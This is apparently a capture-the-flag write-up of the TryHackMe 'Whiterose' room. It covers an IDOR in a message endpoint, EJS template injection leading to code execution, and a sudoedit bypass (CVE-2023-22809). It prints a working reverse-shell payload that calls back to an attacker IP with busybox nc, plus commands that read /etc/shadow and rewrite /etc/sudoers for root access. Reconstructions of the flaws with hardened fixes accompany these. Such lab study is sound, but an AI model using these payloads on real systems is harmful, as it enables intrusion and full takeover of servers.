# Whiterose

{% embed url="<https://tryhackme.com/r/room/whiterose>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

We start with an Nmap scan and find two open ports: SSH on port 22 and an `nginx/1.14.0` web server on port 80.

<figure><img src="/files/azkVjj7h3AmVEDGahXkX" alt=""><figcaption></figcaption></figure>

Visiting the index page of the web server redirects us to `cyprusbank.thm`. We add this hostname to our `/etc/hosts` and reload the page.

```
whiterose.thm → cyprusbank.thm
```

<figure><img src="/files/P3p7JKien0Yqrw3IUzEP" alt=""><figcaption></figcaption></figure>

After we have reloaded the page, we only see a static page without any functionality.

<figure><img src="/files/AehHXaCPhWHtffT5R7YY" alt=""><figcaption></figcaption></figure>

The directory scan did not reveal anything either.

<figure><img src="/files/wEPIFpGNz67dFYBNi6ly" alt=""><figcaption></figcaption></figure>

A vhost scan with ffuf reveals two vhosts, `www` and `admin`, where `admin` points to a page we have not seen yet. We add both to our `/etc/hosts`.

{% code overflow="wrap" %}

```
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://cyprusbank.thm/ -H "Host:FUZZ.cyprusbank.thm" -fw 1
```

{% endcode %}

<figure><img src="/files/CXprmNHu7sfXIihWfC6r" alt=""><figcaption></figcaption></figure>

A directory scan of the `admin` vhost with Feroxbuster does not reveal any endpoints beyond those we also find manually.

<figure><img src="/files/RKrgG7WbXL1doWzExE7T" alt=""><figcaption></figcaption></figure>

## Web Access Olivia Cortez

The index page of `admin.cyprusbank.thm` redirects us to a login page. Credentials for this login are obtained from the room description.

<figure><img src="/files/u2SOCOHByEJ3nyukkoWv" alt=""><figcaption></figcaption></figure>

We can log in as `Olivia Cortez`, but that user only has limited permissions: we cannot read all of the data, and the `settings` endpoint is not available to us.

<figure><img src="/files/RHuNxAd42cS7KvaCQICU" alt=""><figcaption></figcaption></figure>

## Web Access Gayle Bev

We can, however, view the message history. The page is requested with `?c=5` when we open it, so the `c` parameter is a candidate for IDOR: if the server looks the conversation up by this id alone, we can simply substitute other values.

```
http://admin.cyprusbank.thm/messages/?c=5
```

<figure><img src="/files/dbXSn58D3akcs0lX0UWe" alt=""><figcaption></figcaption></figure>

With the parameter value `0` we find the credentials of an admin user `Gayle Bev`.

```
http://admin.cyprusbank.thm/messages/?c=0
```

<figure><img src="/files/8T7PsC78uKvf5Mpf1WNs" alt=""><figcaption></figcaption></figure>
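The server-side lookup behind `/messages?c=<id>` is not visible in the room, so the following is an added example, not the application's or the writeup's code. It reconstructs the endpoint twice, as the insecure direct object reference that lets a low-privileged user walk from `c=5` to `c=0`, and with the authorization check that is missing. The message store, user names and field names are constructed assumptions for the example.

```javascript
// Added example: a reconstruction of the lookup behind "/messages?c=<id>", first as an
// insecure direct object reference (the id alone selects the record), then with the
// authorization check that is missing. This is not the room's or the writeup's code;
// the store, user names and field names below are constructed for the example.

// Constructed message store. `id` is what the `c` query parameter selects; record 0
// stands in for the conversation that leaked the admin credentials in the room.
const MESSAGES = [
  { id: 0, owner: "admin",  body: "internal note containing admin credentials" },
  { id: 5, owner: "olivia", body: "customer follow-up" },
  { id: 7, owner: "bob",    body: "another staff member's thread" },
];

// Constructed sessions, as the application would hold them after login.
const SESSIONS = {
  olivia: { user: "olivia", role: "staff" },
  gayle:  { user: "gayle",  role: "admin" },
};

// Accept only a plain non-negative integer ("5"), not "5abc", "", or a missing value.
function parseId(raw) {
  return typeof raw === "string" && /^\d+$/.test(raw) ? Number(raw) : null;
}

// Vulnerable: whatever `c` says is returned; nobody asks who is requesting it.
function messagesVulnerable(session, query) {
  const msg = MESSAGES.find((m) => m.id === parseId(query.c));
  return msg ? { status: 200, body: msg.body } : { status: 404, body: "not found" };
}

// Hardened: the session, not the request, decides what may be read.
function canRead(session, msg) {
  return session.role === "admin" || msg.owner === session.user;
}

function messagesHardened(session, query) {
  const id = parseId(query.c);
  if (id === null) return { status: 400, body: "bad id" };
  const msg = MESSAGES.find((m) => m.id === id);
  // Answer 404 for both "does not exist" and "not yours": a distinct 403 would tell
  // an attacker which ids exist, which is what makes enumeration cheap.
  if (!msg || !canRead(session, msg)) return { status: 404, body: "not found" };
  return { status: 200, body: msg.body };
}

// The walk from c=5 down to c=0 that the writeup does by hand, against either handler.
// Returns the ids that came back with 200.
function enumerate(handler, session, ids) {
  return ids
    .map((c) => ({ c, status: handler(session, { c: String(c) }).status }))
    .filter((r) => r.status === 200)
    .map((r) => r.c);
}

console.log("vulnerable:", enumerate(messagesVulnerable, SESSIONS.olivia, [5, 4, 3, 2, 1, 0]));
console.log("hardened:  ", enumerate(messagesHardened, SESSIONS.olivia, [5, 4, 3, 2, 1, 0]));
```

Run with `node`: the vulnerable handler returns records `5` and `0` to Olivia, the hardened one only `5`. The fix is the `canRead` check, not a harder-to-guess id; the 404-for-everything choice additionally stops the endpoint from acting as an existence oracle.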

We use the found credentials to log in as `Gayle Bev` and are successful.

<figure><img src="/files/hf1MjM2SCCgaYhCWBcHc" alt=""><figcaption></figcaption></figure>

We are now able to read the telephone numbers.

<figure><img src="/files/fM8eDIoIUEPaO5y7iU6M" alt=""><figcaption></figcaption></figure>

## Shell as web

As `Gayle Bev` we have access to the settings endpoint, where customers' passwords can be set. What is noticeable is that the submitted password is reflected in the response. That immediately suggests XSS or SSTI.

<figure><img src="/files/SWJbhVat34ruyf0tvgbP" alt=""><figcaption></figcaption></figure>

If we intercept the request and remove parameters such as the password, an error message appears that references `.ejs` files. So the backend renders EJS templates.

<figure><img src="/files/5Uska9lSj7SO7cDq8Kv8" alt=""><figcaption></figcaption></figure>

Searching for SSTI payloads that apply when `ejs` is in use, we find the following two sources:

{% embed url="<https://github.com/mde/ejs/issues/720>" %}

{% embed url="<https://eslam.io/posts/ejs-server-side-template-injection-rce/>" %}

We use the payload from the article and first make the target request a URL on our own web server, to test whether the injected code is actually executed.

{% code overflow="wrap" %}

```
%%1");process.mainModule.require('child_process').execSync('curl http://10.14.90.235');//
```

{% endcode %}

<figure><img src="/files/uAfWpgWJ4LfnEpsq24O0" alt=""><figcaption></figcaption></figure>

We receive the callback on our web server right away. Great, we have an SSTI here that we can leverage to RCE.

<figure><img src="/files/ge6qCyuSZFbpWLa5sjEj" alt=""><figcaption></figcaption></figure>
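Why does a form field named `settings[view options][outputFunctionName]` end up as executed code? The following is an added example, not the application's code and not the `ejs` package, that reconstructs the path with Node built-ins only: an extended form parser turns the bracket key into a nested `settings` object, a render call that merges the request body into its options lets that object shadow the app's real settings, and a compiler that, like EJS, splices `outputFunctionName` unquoted into the generated JavaScript. The template text, field names and the benign marker payload are constructed for the example; the hardened variants at the end show the two fixes.

```javascript
// Added example (not the application's code and not the ejs package): a reconstruction
// of the path from the "settings[view options][outputFunctionName]" body parameter to
// server-side code execution, using only Node built-ins. parseForm, buildRenderOptions
// and compileTemplate are simplified stand-ins for Express's extended form parser, a
// res.render(view, req.body) call, and EJS's template compiler; the template text and
// the field names are constructed for the example.

// 1. Extended form decoding: bracket keys become nested objects, so
//    settings[view options][outputFunctionName]=v
//    -> { settings: { "view options": { outputFunctionName: "v" } } }
function parseForm(body) {
  const out = {};
  for (const pair of body.split("&")) {
    const eq = pair.indexOf("=");
    const key = decodeURIComponent((eq < 0 ? pair : pair.slice(0, eq)).replace(/\+/g, " "));
    const val = decodeURIComponent((eq < 0 ? "" : pair.slice(eq + 1)).replace(/\+/g, " "));
    const path = key.match(/[^\[\]]+/g) || [];
    let cur = out;
    path.forEach((p, i) => {
      if (i === path.length - 1) cur[p] = val;
      else cur = cur[p] = cur[p] || {};
    });
  }
  return out;
}

// 2. Render options: the app's settings are the base and the request body is merged on
//    top (shallowly), so a body field named `settings` shadows the real settings object
//    and its "view options" flow straight into the template compiler.
const APP_SETTINGS = { "view options": {} };

function buildRenderOptions(body) {
  const merged = Object.assign({ settings: APP_SETTINGS }, body);
  const viewOpts = (merged.settings && merged.settings["view options"]) || {};
  return Object.assign({}, viewOpts, { locals: body });
}

// 3. A stripped-down compiler. Like EJS, it splices outputFunctionName into the
//    generated JavaScript source unquoted, then turns that source into a function.
function compileTemplate(templateSrc, opts) {
  let src = "var __output = '';\n" +
            "function __append(s) { if (s !== undefined && s !== null) __output += s; }\n";
  if (opts.outputFunctionName) {
    src += "var " + opts.outputFunctionName + " = __append;\n";
  }
  // Only "<%= expr %>" interpolation, to keep the example short.
  templateSrc.split(/<%=([\s\S]*?)%>/).forEach((part, i) => {
    src += "__append(" + (i % 2 === 0 ? JSON.stringify(part) : part.trim()) + ");\n";
  });
  src += "return __output;";
  return new Function("locals", src);
}

const TEMPLATE = "<p>Password for <%= locals.name %> updated.</p>";

// Constructed payload in the writeup's shape. The shell command is replaced by a
// benign global write so the example runs safely and the effect is still observable.
const PAYLOAD_BODY =
  "name=a&password=b&settings[view options][outputFunctionName]=" +
  encodeURIComponent("x;globalThis.__ssti_marker = 'executed';//");

// Vulnerable flow: the whole request body becomes render options.
function renderForRequest(body) {
  const opts = buildRenderOptions(parseForm(body));
  return compileTemplate(TEMPLATE, opts)(opts.locals);
}

// Hardened flow: locals are built from known fields only and template settings are
// taken from the application, never from the request.
function renderForRequestHardened(body) {
  const parsed = parseForm(body);
  const locals = { name: String(parsed.name || "") };
  const opts = Object.assign({}, APP_SETTINGS["view options"], { locals });
  return compileTemplate(TEMPLATE, opts)(locals);
}

// Second layer, the check later EJS versions added: refuse an outputFunctionName that
// is not a plain identifier, so even a leaked option cannot carry statements.
const JS_IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]*$/;
function compileTemplateStrict(templateSrc, opts) {
  if (opts.outputFunctionName && !JS_IDENTIFIER.test(opts.outputFunctionName)) {
    throw new Error("outputFunctionName must be a valid JavaScript identifier");
  }
  return compileTemplate(templateSrc, opts);
}

console.log(renderForRequest(PAYLOAD_BODY), "marker:", globalThis.__ssti_marker);
```

With the payload, the generated source starts with `var x;globalThis.__ssti_marker = 'executed';// = __append;`: the `x;` closes the `var`, the injected statement runs, and the trailing `//` comments out the rest of the line, which is exactly why the writeup's payload ends in `//`. In the room that statement is `process.mainModule.require('child_process').execSync(...)`, so the same mechanism yields command execution. The rendered HTML is identical in both flows, which is why a reflected value alone looks harmless; only the side effect gives the injection away.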

Next, we prepare a reverse shell: a simple base64-encoded busybox reverse shell, generated with `revshells.com`.

<figure><img src="/files/RGiFuys9koOsrYRivi0t" alt=""><figcaption></figcaption></figure>

Next, we set up a listener and use the following payload to spawn a reverse shell. The base64 string decodes to `busybox nc 10.14.90.235 4445 -e /bin/bash`.

{% code overflow="wrap" %}

```
name=a&passord=b&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('bash -c "echo YnVzeWJveCBuYyAxMC4xNC45MC4yMzUgNDQ0NSAtZSAvYmluL2Jhc2g= | base64 -d | bash"');//
```

{% endcode %}

<figure><img src="/files/XHJUKnXnTkURrapLUbPJ" alt=""><figcaption></figcaption></figure>

We receive a connection back as the user `web`. The first flag is in the home directory of `web`. We then upgrade the reverse shell to a full TTY.

{% embed url="<https://0xffsec.com/handbook/shells/full-tty/>" %}

<figure><img src="/files/XKAGzYRxTzgO7ZDbrdpP" alt=""><figcaption></figcaption></figure>

## Shell as root

We see that we are allowed to run `sudoedit` as `root` without a password, but only for the specific file `/etc/nginx/sites-available/admin.cyprusbank.thm`.

<figure><img src="/files/mFMASgjrWYUoP58SfXhb" alt=""><figcaption></figcaption></figure>

After a short search, we find `CVE-2023-22809`, a bypass for `sudoedit` that affects sudo versions from 1.8.0 up to and including `1.9.12p1`. `sudoedit` takes the editor from the `SUDO_EDITOR`, `VISUAL` or `EDITOR` environment variable and splits that value into arguments; anything after a `--` in it is treated as an additional file to edit. A user who may `sudoedit` a single file can therefore have any file opened, and written back, with root privileges. Sudo 1.9.12p2 fixes this.

{% embed url="<https://www.vicarius.io/vsociety/posts/cve-2023-22809-sudoedit-bypass-analysis>" %}

We confirm that the installed version of `sudo` falls into the affected range.

<figure><img src="/files/AITWzPRtpXwfAadoNoxz" alt=""><figcaption></figcaption></figure>

With `export EDITOR="vi -- /etc/shadow"` we make `sudoedit` hand `/etc/shadow` to `vi` as an additional file when we edit the permitted nginx config.

```
export EDITOR="vi -- /etc/shadow"
sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
```

<figure><img src="/files/1Mr1KQFtbThOdsdEbXRu" alt=""><figcaption></figcaption></figure>

And we are able to read `/etc/shadow`.

<figure><img src="/files/tTYGQ3Ci4gEPYvAaYnXC" alt=""><figcaption></figcaption></figure>

Next, we try that with the root flag and are able to read it.

```
export EDITOR="vi -- /root/root.txt"
sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
```

<figure><img src="/files/yBAM7rucr4NF9H1Lts27" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/tsn5Q3cAkVqtfXqfyaZT" alt=""><figcaption></figcaption></figure>

To escalate our privileges to root, we edit the `/etc/sudoers` file the same way. Since `sudoedit` writes the edited temporary copy back as root, the change persists. Note that this bypasses the syntax check `visudo` would perform, so a typo here would break `sudo` for every user on the box.

```
export EDITOR="vi -- /etc/sudoers"
sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
```

Here we target the line that grants us the `sudoedit` command:

```
web ALL=(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
```

and replace it with the following:

```
web ALL=(root) NOPASSWD: ALL
```

<figure><img src="/files/4s63ol5xmRTZBhzWC5P6" alt=""><figcaption></figcaption></figure>

Now we are able to execute any command as root without providing a password and use that to switch to the `root` user. As `root` we find the final flag at `/root/root.txt`.

<figure><img src="/files/v4YRo6jTqlVW4BUPuBlV" alt=""><figcaption></figcaption></figure>

